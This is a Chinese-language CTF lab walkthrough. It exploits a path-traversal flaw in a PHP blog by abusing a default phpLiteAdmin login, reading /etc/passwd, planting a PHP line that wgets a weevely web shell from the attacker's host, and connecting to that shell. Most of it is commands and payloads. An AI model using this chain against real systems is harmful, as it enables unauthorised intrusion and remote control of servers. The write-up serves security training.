【CTF】路径遍历实战


kali:192.168.223.131
target:192.168.223.171

通过arp-scan -l获取目标IP为192.168.223.171,nmap扫描一下,开放22、80、111、39682端口

nmap -p- -A 192.168.223.171

看一眼网页,是单页博客,使用web扫描工具nikto看看有没有敏感信息

nikto -h http://192.168.223.171

再开个dirb进行扫描

dirb http://192.168.223.171

扫描到一个dbadmin的文件,里面有test_db.php的文件

点开是个登陆窗口,Google搜索phpLiteAdmin默认密码是admin登陆

再通过owasp-zap进行扫描

owasp-zap    //打开图形化软件
//直接输入目标网站url,开始扫描后结果都放在Alerts栏目下

由于我是kali中文版,正常应该是Alerts,Alerts里面越红表示越危险,其中第一个是一个目录遍历的漏洞,发现里面的/etc/passwd

192.168.223.171/view.php?page=../../../../../../../etc/passwd

利用weevely生成木马

//密码是123456
weevely generate 123456 /root/shell.php

利用目录遍历漏洞,创建一个shell.php的库,表名是a,里面有一个字段b,类型是text,目的是在b字段插入值,下载kali上保存的木马文件

<?php system("cd /tmp;wget http://192.168.223.131:8000/shell.php;chmod +x shell.php;");?>

通过python开启8000端口

python -m SimpleHTTPServer

访问网站保存该表的位置

192.168.223.171/view.php?page=../../../../../../../usr/databases/shell.php

此时网站将会下载文件,注意HTTPServer开启的位置下需要有木马文件,否则路径错误

此时获取文件保存位置后连接即可

weevely http://192.168.223.171/view.php?page=../../../../../../../tmp/shell.php 123456

相关